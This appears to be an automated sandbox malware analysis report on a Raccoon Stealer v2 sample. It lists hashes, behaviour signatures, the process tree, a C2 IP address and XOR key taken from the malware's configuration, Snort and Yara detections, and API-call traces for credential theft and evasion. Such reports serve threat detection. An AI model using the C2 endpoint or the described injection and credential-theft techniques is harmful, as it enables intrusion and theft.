Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe

Overview

General Information

Sample name:	SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe
Analysis ID:	1417514
MD5:	20540ccd8f4132e0fff9daec9f143997
SHA1:	0fb2c50a19db4b8f2c6998e85b437780765fd61c
SHA256:	25f7e04b4c4fe0f1dc604270cbe8a53433580f9c5372f56abac420de4ced4322
Tags:	exe
Infos:

Detection

Raccoon Stealer v2

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Snort IDS alert for network traffic

Yara detected Raccoon Stealer v2

.NET source code contains very large array initializations

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Found evasive API chain (may stop execution after checking mutex)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Tries to delay execution (extensive OutputDebugStringW loop)

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Internet Provider seen in connection with other malware

One or more processes crash

PE file contains an invalid checksum

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe (PID: 760 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe" MD5: 20540CCD8F4132E0FFF9DAEC9F143997)

conhost.exe (PID: 6156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

conhost.exe (PID: 7056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 4812 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

WerFault.exe (PID: 4904 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 760 -s 992 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Configuration

Threatname: Raccoon

{"C2 url": ["http://89.238.170.230:80"], "Bot ID": "d1fc95c6179be4b0b4f93eff6ab3f08f", "XOR key": "d1fc95c6179be4b0b4f93eff6ab3f08f"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000003.00000002.2418304008.0000000001586000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RaccoonV2_1	Yara detected Raccoon Stealer v2	Joe Security
00000000.00000002.1286483341.00000000031E6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RaccoonV2_1	Yara detected Raccoon Stealer v2	Joe Security
Process Memory Space: SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe PID: 760	JoeSecurity_RaccoonV2_1	Yara detected Raccoon Stealer v2	Joe Security
Process Memory Space: RegAsm.exe PID: 4812	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
Process Memory Space: RegAsm.exe PID: 4812	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 4812	JoeSecurity_RaccoonV2_1	Yara detected Raccoon Stealer v2	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author
3.2.RegAsm.exe.400000.0.unpack	JoeSecurity_RaccoonV2_1	Yara detected Raccoon Stealer v2	Joe Security
3.2.RegAsm.exe.400000.0.raw.unpack	JoeSecurity_RaccoonV2_1	Yara detected Raccoon Stealer v2	Joe Security
3.2.RegAsm.exe.154e88f.3.unpack	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security

Snort Signatures

ET TROJAN Win32/RecordBreaker CnC Checkin M1 - Source IP: 192.168.2.7 - Destination IP: 89.238.170.230

Timestamp:	03/29/24-14:23:53.631287
SID:	2036934
Source Port:	49699
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/RecordBreaker CnC Checkin - Server Response - Source IP: 89.238.170.230 - Destination IP: 192.168.2.7

Timestamp:	03/29/24-14:23:53.924786
SID:	2036955
Source Port:	80
Destination Port:	49699
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe

Avira: detected

Found malware configuration

Source: 00000000.00000002.1286483341.00000000031E6000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Raccoon {"C2 url": ["http://89.238.170.230:80"], "Bot ID": "d1fc95c6179be4b0b4f93eff6ab3f08f", "XOR key": "d1fc95c6179be4b0b4f93eff6ab3f08f"}

Machine Learning detection for sample

Source: SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe

Joe Sandbox ML: detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00402C05 LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,LocalFree,CryptUnprotectData,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,PathCombineW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,LocalFree,LocalFree,LocalAlloc,lstrcpy,LocalAlloc,lstrcmp,LocalAlloc,lstrcmpW,wsprintfW,lstrlenW,wsprintfW,lstrlenW,CryptUnprotectData,lstrcmpW,wsprintfW,lstrlenW,wsprintfW,lstrlenW,LocalFree,LocalFree,LocalFree,LocalFree,	3_2_00402C05
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040318A LocalAlloc,StrCpyW,LocalAlloc,LocalAlloc,LocalFree,CryptUnprotectData,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,LocalAlloc,PathCombineW,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,lstrcpy,LocalAlloc,lstrcmp,LocalAlloc,wsprintfW,lstrlenW,lstrlenW,LocalFree,CryptUnprotectData,wsprintfW,lstrlenW,lstrlenW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,	3_2_0040318A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00402723 LocalAlloc,StrCpyW,LocalAlloc,LocalAlloc,LocalFree,CryptUnprotectData,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,LocalAlloc,PathCombineW,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,lstrcpy,LocalAlloc,lstrcmp,LocalAlloc,wsprintfW,lstrlenW,lstrlenW,LocalFree,CryptUnprotectData,wsprintfW,lstrlenW,lstrlenW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,	3_2_00402723
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00401639 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree,	3_2_00401639
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004044BB LocalAlloc,StrCpyW,LocalAlloc,LocalAlloc,LocalFree,CryptUnprotectData,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,LocalAlloc,PathCombineW,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,lstrcpy,LocalAlloc,lstrcmp,LocalAlloc,wsprintfW,lstrlenW,lstrlenW,LocalFree,CryptUnprotectData,wsprintfW,lstrlenW,lstrlenW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,	3_2_004044BB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040823C LocalAlloc,CryptStringToBinaryA,lstrlenA,CryptStringToBinaryA,MultiByteToWideChar,LocalAlloc,MultiByteToWideChar,StrCpyW,LocalFree,StrCpyW,StrCpyW,LocalFree,	3_2_0040823C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004015BE CryptBinaryToStringW,LocalAlloc,CryptBinaryToStringW,StrCpyW,LocalFree,LocalFree,	3_2_004015BE

Source: SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: Birding.pdb source: SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe, WER1262.tmp.dmp.7.dr
Source:	Binary string: freebl3.pdb source: freebl3.dll.3.dr
Source:	Binary string: softokn3.pdbp source: softokn3.dll.3.dr
Source:	Binary string: $$.pdb)s source: SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe, 00000000.00000002.1285616817.00000000012FA000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Birding.pdbbp>- source: SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe, 00000000.00000002.1285674615.0000000001452000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\Birding.pdbD source: SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe, 00000000.00000002.1285674615.000000000143C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Birding.pdbirding.pdbpdbing.pdbpdb source: SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe, 00000000.00000002.1285616817.00000000012FA000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: Birding.pdbh source: SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe
Source:	Binary string: \??\C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.PDB source: SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe, 00000000.00000002.1285674615.0000000001452000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbL0vw# source: WER1262.tmp.dmp.7.dr
Source:	Binary string: @xo.pdbsw source: SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe, 00000000.00000002.1285616817.00000000012FA000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Desktop\Birding.pdb source: SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe, 00000000.00000002.1285674615.0000000001452000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER1262.tmp.dmp.7.dr
Source:	Binary string: mozglue.pdb source: mozglue.dll.3.dr
Source:	Binary string: Birding.pdbS source: SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe, 00000000.00000002.1285674615.0000000001484000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.3.dr
Source:	Binary string: \??\C:\Users\user\Desktop\Birding.pdb1 source: SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe, 00000000.00000002.1285674615.0000000001452000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: HPlo0C:\Windows\Birding.pdb source: SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe, 00000000.00000002.1285616817.00000000012FA000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.3.dr
Source:	Binary string: mscorlib.pdb source: WER1262.tmp.dmp.7.dr
Source:	Binary string: mozglue.pdb@+ source: mozglue.dll.3.dr
Source:	Binary string: symbols\exe\Birding.pdb source: SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe, 00000000.00000002.1285616817.00000000012FA000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WER1262.tmp.dmp.7.dr
Source:	Binary string: nss3.pdb source: nss3.dll.3.dr
Source:	Binary string: C:\Windows\Birding.pdbpdbing.pdb source: SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe, 00000000.00000002.1285674615.0000000001452000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\Birding.pdb source: SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe, 00000000.00000002.1285674615.0000000001452000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: softokn3.pdb source: softokn3.dll.3.dr
Source:	Binary string: \??\C:\Windows\Birding.pdbJp&- source: SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe, 00000000.00000002.1285674615.0000000001452000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ?xoC:\Users\user\Desktop\Birding.pdbsw source: SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe, 00000000.00000002.1285616817.00000000012FA000.00000004.00000010.00020000.00000000.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040DC49 SetEnvironmentVariableA,CreateWaitableTimerA,OutputDebugStringA,RegOpenKeyExA,CreateWaitableTimerA,GetLastError,GetLastError,CancelWaitableTimer,FindFirstFileA,FindClose,CreateSemaphoreA,ReleaseSemaphore,CreateEventA,SetEvent,ResetEvent,CreateSemaphoreA,ReleaseSemaphore,GetLastError,CreateMutexA,OutputDebugStringA,ReleaseMutex,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,LocalAlloc,lstrlenA,FindFirstFileA,FindClose,CreateSemaphoreA,RegOpenKeyExA,ReleaseSemaphore,CreateWaitableTimerA,CancelWaitableTimer,OutputDebugStringA,GetLastError,CreateFileMappingW,	3_2_0040DC49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00404B50 SetEnvironmentVariableA,CreateSemaphoreA,GetLastError,OutputDebugStringA,CreateSemaphoreA,ReleaseSemaphore,ReleaseSemaphore,CreateMutexA,CreateFileMappingW,RegOpenKeyExA,CloseHandle,CreateEventA,SetEvent,ResetEvent,FindFirstFileA,FindFirstFileA,FindClose,CreateMutexA,ReleaseMutex,RegOpenKeyExA,CreateSemaphoreA,ReleaseSemaphore,GetLastError,CreateFileMappingW,FindFirstFileA,FindClose,CreateEventA,SetEvent,ResetEvent,CreateEventA,SetEvent,ResetEvent,LocalAlloc,GetLastError,LocalFree,LocalFree,LocalAlloc,LocalFree,GetLastError,CreateSemaphoreA,ReleaseSemaphore,OutputDebugStringA,OutputDebugStringA,SetEnvironmentVariableA,CreateWaitableTimerA,CreateWaitableTimerA,SetEnvironmentVariableA,CancelWaitableTimer,CreateWaitableTimerA,GetLastError,CancelWaitableTimer,CreateWaitableTimerA,RegOpenKeyExA,CancelWaitableTimer,CreateSemaphoreA,GetLastError,ReleaseSemaphore,LocalAlloc,LocalFree,OutputDebugStringA,CreateWaitableTimerA,OutputDebugStringA,CancelWaitableTimer,SetEnvironmentVariableA,CreateWaitableTimerA,CreateWaitableTimerA,OutputDebugStringA,CancelWaitableTimer,FindFirstFileA,FindClose,CreateMutexA,ReleaseMutex,CreateFileMappingW,CloseHandle,OutputDebugStringA,OutputDebugStringA,CreateWaitableTimerA,CancelWaitableTimer,CreateMutexA,CreateWaitableTimerA,CreateSemaphoreA,CancelWaitableTimer,SetEnvironmentVariableA,CreateFileMappingW,FindCloseChangeNotification,CreateMutexA,CreateWaitableTimerA,SetEnvironmentVariableA,CancelWaitableTimer,CancelWaitableTimer,CreateWaitableTimerA,OutputDebugStringA,CancelWaitableTimer,GetLastError,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,CreateFileMappingW,SetEnvironmentVariableA,FindCloseChangeNotification,FindFirstFileA,FindClose,CreateSemaphoreA,RegOpenKeyExA,ReleaseSemaphore,ReleaseSemaphore,CreateMutexA,GetLastError,ReleaseMutex,OutputDebugStringA,RegOpenKeyExA,CreateWaitableTimerA,CancelWaitableTimer,SetEnvironmentVariableA,CreateSemaphoreA,ReleaseSemaphore,RegOpenKeyExA,CreateSemaphoreA,ReleaseSemaphore,SetEnvironmentVariableA,CreateWaitableTimerA,CancelWaitableTimer,RegOpenKeyExA,CreateSemaphoreA,OutputDebugStringA,ReleaseSemaphore,ReleaseSemaphore,CreateFileMappingW,FindCloseChangeNotification,CreateWaitableTimerA,CreateSemaphoreA,ReleaseSemaphore,RegOpenKeyExA,FindFirstFileA,FindClose,CreateMutexA,ReleaseMutex,RegOpenKeyExA,OutputDebugStringA,CreateFileMappingW,CreateFileMappingW,FindCloseChangeNotification,CreateFileMappingW,RegOpenKeyExA,CloseHandle,LocalAlloc,CreateMutexA,OutputDebugStringA,ReleaseMutex,SetEnvironmentVariableA,CreateWaitableTimerA,OutputDebugStringA,CancelWaitableTimer,CreateSemaphoreA,ReleaseSemaphore,ReleaseSemaphore,OutputDebugStringA,CreateSemaphoreA,ReleaseSemaphore,RegOpenKeyExA,CreateMutexA,ReleaseMutex,LocalAlloc,RegOpenKeyExA,LocalFree,CreateFileMappingW,RegOpenKeyExA,FindCloseChangeNotification,CreateEventA,SetEvent,ResetEvent,CreateMutexA,ReleaseMutex,OutputDebugStringA,SetEnvironmentVariableA,CreateSemaphoreA,OutputDebugStringA,ReleaseSem	3_2_00404B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00409ADC EntryPoint,LocalAlloc,LocalFree,OutputDebugStringA,OutputDebugStringA,CreateSemaphoreA,ReleaseSemaphore,CreateWaitableTimerA,CreateWaitableTimerA,CancelWaitableTimer,CreateWaitableTimerA,SetEnvironmentVariableA,SetEnvironmentVariableA,CancelWaitableTimer,CreateSemaphoreA,ReleaseSemaphore,CoInitialize,CreateFileMappingW,SetEnvironmentVariableA,FindCloseChangeNotification,SetEnvironmentVariableA,CreateSemaphoreA,ReleaseSemaphore,CreateWaitableTimerA,CreateWaitableTimerA,CancelWaitableTimer,RegOpenKeyExA,CreateWaitableTimerA,CancelWaitableTimer,GetLastError,CreateSemaphoreA,ReleaseSemaphore,OutputDebugStringA,LocalAlloc,LocalFree,OutputDebugStringA,CreateWaitableTimerA,OutputDebugStringA,SetEnvironmentVariableA,CancelWaitableTimer,CreateMutexA,SetEnvironmentVariableA,ReleaseMutex,OutputDebugStringA,CreateSemaphoreA,ReleaseSemaphore,SetEnvironmentVariableA,CreateSemaphoreA,ReleaseSemaphore,OutputDebugStringA,CreateWaitableTimerA,ExitProcess,CreateWaitableTimerA,CancelWaitableTimer,SetEnvironmentVariableA,CreateSemaphoreA,ReleaseSemaphore,OutputDebugStringA,FindFirstFileA,FindClose,LocalAlloc,LocalFree,GetLastError,SetEnvironmentVariableA,CreateWaitableTimerA,GetLastError,GetLastError,OutputDebugStringA,CancelWaitableTimer,CreateMutexA,ReleaseMutex,SetEnvironmentVariableA,GetLastError,CreateEventA,SetEvent,ResetEvent,CreateSemaphoreA,ReleaseSemaphore,RegOpenKeyExA,CreateFileMappingW,SetEnvironmentVariableA,FindCloseChangeNotification,SetEnvironmentVariableA,LocalAlloc,LocalFree,CreateWaitableTimerA,CreateWaitableTimerA,OutputDebugStringA,CancelWaitableTimer,CreateWaitableTimerA,CancelWaitableTimer,RegOpenKeyExA,LocalAlloc,SetEnvironmentVariableA,LocalFree,SetEnvironmentVariableA,CreateWaitableTimerA,CancelWaitableTimer,SetEnvironmentVariableA,CreateFileMappingW,GetLastError,FindCloseChangeNotification,CreateSemaphoreA,CreateSemaphoreA,ReleaseSemaphore,CreateWaitableTimerA,CancelWaitableTimer,RegOpenKeyExA,CreateSemaphoreA,ReleaseSemaphore,RegOpenKeyExA,OutputDebugStringA,FindFirstFileA,FindClose,CreateSemaphoreA,ReleaseSemaphore,SetEnvironmentVariableA,OutputDebugStringA,CreateSemaphoreA,ReleaseSemaphore,CreateEventA,SetEvent,ResetEvent,CreateWaitableTimerA,CreateWaitableTimerA,CancelWaitableTimer,OutputDebugStringA,CreateFileMappingW,CloseHandle,CreateMutexA,ReleaseMutex,RegOpenKeyExA,GetLastError,CreateFileMappingW,FindCloseChangeNotification,OutputDebugStringA,CreateMutexA,ReleaseMutex,LocalAlloc,LocalFree,RegOpenKeyExA,CreateWaitableTimerA,SetEnvironmentVariableA,CancelWaitableTimer,CreateSemaphoreA,CreateSemaphoreA,ReleaseSemaphore,CreateSemaphoreA,SetEnvironmentVariableA,ReleaseSemaphore,RegOpenKeyExA,CreateEventA,SetEvent,ResetEvent,CreateWaitableTimerA,CreateEventA,SetEvent,ResetEvent,LocalAlloc,OutputDebugStringA,LocalFree,OutputDebugStringA,CreateFileMappingW,OutputDebugStringA,FindCloseChangeNotification,CreateSemaphoreA,SetEnvironmentVariableA,ReleaseSemaphore,GetLastError,FindFirstFileA,FindClose,CreateWaitableTimerA,CreateWa	3_2_00409ADC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040F4F1 CancelWaitableTimer,CreateSemaphoreA,ReleaseSemaphore,GetLastError,CreateEventA,SetEvent,ResetEvent,CreateMutexA,OutputDebugStringA,OutputDebugStringA,ReleaseMutex,SetEnvironmentVariableA,CreateFileMappingW,CreateFileMappingW,CloseHandle,FindCloseChangeNotification,LocalAlloc,LocalFree,FindFirstFileA,LocalAlloc,CreateFileMappingW,OutputDebugStringA,CloseHandle,SetEnvironmentVariableA,SetEnvironmentVariableA,CreateWaitableTimerA,SetEnvironmentVariableA,CancelWaitableTimer,OutputDebugStringA,CreateMutexA,ReleaseMutex,OutputDebugStringA,OutputDebugStringA,CreateSemaphoreA,ReleaseSemaphore,OutputDebugStringA,SetEnvironmentVariableA,FindFirstFileA,FindClose,LocalAlloc,RegOpenKeyExA,RegOpenKeyExA,LocalFree,RegOpenKeyExA,CreateWaitableTimerA,RegQueryValueExW,RegQueryValueExW,	3_2_0040F4F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040ED79 lstrlenA,SetEnvironmentVariableA,CreateWaitableTimerA,OutputDebugStringA,CreateWaitableTimerA,CancelWaitableTimer,CreateMutexA,RegOpenKeyExA,OutputDebugStringA,OutputDebugStringA,ReleaseMutex,RegOpenKeyExA,OutputDebugStringA,OutputDebugStringA,CreateSemaphoreA,ReleaseSemaphore,RegOpenKeyExA,LocalAlloc,RegOpenKeyExA,LocalFree,CreateSemaphoreA,ReleaseSemaphore,CreateEventA,SetEvent,ResetEvent,CreateWaitableTimerA,GetLastError,CancelWaitableTimer,OutputDebugStringA,LocalAlloc,MultiByteToWideChar,CreateFileMappingW,GetLastError,FindCloseChangeNotification,FindFirstFileA,FindClose,CreateWaitableTimerA,CancelWaitableTimer,RegOpenKeyExA,CreateEventA,SetEvent,ResetEvent,CreateWaitableTimerA,CancelWaitableTimer,CreateSemaphoreA,ReleaseSemaphore,OutputDebugStringA,OutputDebugStringA,LocalAlloc,SetEnvironmentVariableA,SetEnvironmentVariableA,LocalFree,OutputDebugStringA,SetEnvironmentVariableA,	3_2_0040ED79
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040EB7B CreateEventA,SetEvent,ResetEvent,CreateSemaphoreA,ReleaseSemaphore,OutputDebugStringA,CreateWaitableTimerA,CancelWaitableTimer,CancelWaitableTimer,SetEnvironmentVariableA,FindFirstFileA,FindClose,CreateFileMappingW,OutputDebugStringA,CloseHandle,SetEnvironmentVariableA,LocalAlloc,LocalFree,OutputDebugStringA,CreateWaitableTimerA,CancelWaitableTimer,GetLastError,CreateSemaphoreA,ReleaseSemaphore,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalFree,	3_2_0040EB7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040E48D OutputDebugStringA,CreateWaitableTimerA,CreateSemaphoreA,SetEnvironmentVariableA,CreateSemaphoreA,ReleaseSemaphore,RegOpenKeyExA,CreateSemaphoreA,ReleaseSemaphore,CreateEventA,SetEvent,ResetEvent,LocalAlloc,LocalFree,GetLastError,CreateWaitableTimerA,GetLastError,CancelWaitableTimer,OutputDebugStringA,CreateWaitableTimerA,LocalAlloc,CreateSemaphoreA,ReleaseSemaphore,RegOpenKeyExA,CreateEventA,SetEvent,ResetEvent,CreateWaitableTimerA,SetEnvironmentVariableA,SetEnvironmentVariableA,CancelWaitableTimer,GetLastError,FindFirstFileA,FindClose,SetEnvironmentVariableA,CreateFileMappingW,CloseHandle,GetLastError,CreateWaitableTimerA,CancelWaitableTimer,OutputDebugStringA,OutputDebugStringA,LocalAlloc,SetEnvironmentVariableA,LocalFree,CreateSemaphoreA,OutputDebugStringA,ReleaseSemaphore,OutputDebugStringA,OutputDebugStringA,CreateMutexA,RegOpenKeyExA,ReleaseMutex,SetEnvironmentVariableA,SHGetFolderPathW,CreateEventA,SetEvent,ResetEvent,FindFirstFileA,FindClose,CreateMutexA,ReleaseMutex,RegOpenKeyExA,CreateFileMappingW,RegOpenKeyExA,CloseHandle,RegOpenKeyExA,CreateWaitableTimerA,CancelWaitableTimer,StrCpyW,LocalFree,LocalFree,	3_2_0040E48D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040F012 CancelWaitableTimer,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,CreateFileMappingW,FindCloseChangeNotification,LocalAlloc,GetLastError,GetLastError,LocalFree,CreateWaitableTimerA,CancelWaitableTimer,OutputDebugStringA,OutputDebugStringA,CreateEventA,SetEvent,ResetEvent,CreateMutexA,SetEnvironmentVariableA,SetEnvironmentVariableA,ReleaseMutex,SetEnvironmentVariableA,GetLastError,CreateWaitableTimerA,GetLastError,CancelWaitableTimer,OutputDebugStringA,GetLastError,CreateFileMappingW,FindCloseChangeNotification,OutputDebugStringA,FindFirstFileA,FindClose,CreateSemaphoreA,CreateSemaphoreA,OutputDebugStringA,ReleaseSemaphore,ReleaseSemaphore,SetEnvironmentVariableA,CreateSemaphoreA,ReleaseSemaphore,OutputDebugStringA,CreateMutexA,ReleaseMutex,RegOpenKeyExA,LocalAlloc,GlobalFree,	3_2_0040F012
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004070C9 LocalAlloc,StrCpyW,FindFirstFileW,LocalFree,LocalAlloc,PathCombineW,LocalAlloc,PathCombineW,LocalAlloc,StrCpyW,LocalAlloc,lstrlenW,LocalFree,LocalFree,LocalAlloc,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalFree,CloseHandle,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,LocalFree,FindClose,	3_2_004070C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040194A FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,StrStrW,lstrlenW,lstrlenW,LocalAlloc,PathCombineW,LocalFree,lstrlenW,FindNextFileW,FindClose,	3_2_0040194A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00409452 LocalAlloc,LocalAlloc,LocalAlloc,PathCombineW,PathCombineW,GetFileSize,LocalAlloc,ReadFile,lstrlenA,StrStrA,lstrlenA,StrStrA,LocalAlloc,FindFirstFileW,StrStrW,StrStrW,StrStrW,lstrlenW,lstrlenW,LocalAlloc,StrStrW,StrCpyW,LocalAlloc,PathCombineW,PathCombineW,LocalFree,FindNextFileW,FindClose,LocalFree,CloseHandle,LocalFree,LocalFree,	3_2_00409452
